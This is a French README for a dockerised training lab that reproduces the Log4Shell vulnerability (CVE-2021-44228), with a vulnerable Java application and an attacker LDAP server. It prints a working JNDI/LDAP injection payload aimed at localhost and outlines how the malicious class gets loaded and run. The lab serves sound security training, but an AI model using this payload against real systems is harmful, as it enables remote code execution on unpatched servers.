Environnement de laboratoire pour la vulnérabilité CVE-2021-44228 (Log4Shell)
Introduction
Ce projet fournit un environnement dockerisé pour s'entraîner en toute sécurité et comprendre la vulnérabilité critique Log4j connue sous le nom de CVE-2021-44228 (Log4Shell).
Fonctionnalités clés
- Environnement de test dockerisé sécurisé
- Capacité de test de payload personnalisé
- Inclut le serveur LDAP de l'attaquant et l'application Java vulnérable
Pour commencer
docker compose up --build
Test de payload
- Vous pouvez modifier le payload dans la section de test de
/vulnerable/Makefile
- Le payload par défaut utilise
$${jndi:ldap://127.0.0.1:10000/}
- L'application Java vulnérable démarre
- Le serveur LDAP de l'attaquant écoute sur le port 10000
- L'application vulnérable s'exécute
- Le payload Log4Shell est journalisé dans l'application vulnérable via la section de test du Makefile
- L'application vulnérable tente une recherche JNDI LDAP
- Le serveur LDAP renvoie une classe Java malveillante
- L'application vulnérable charge et exécute cette classe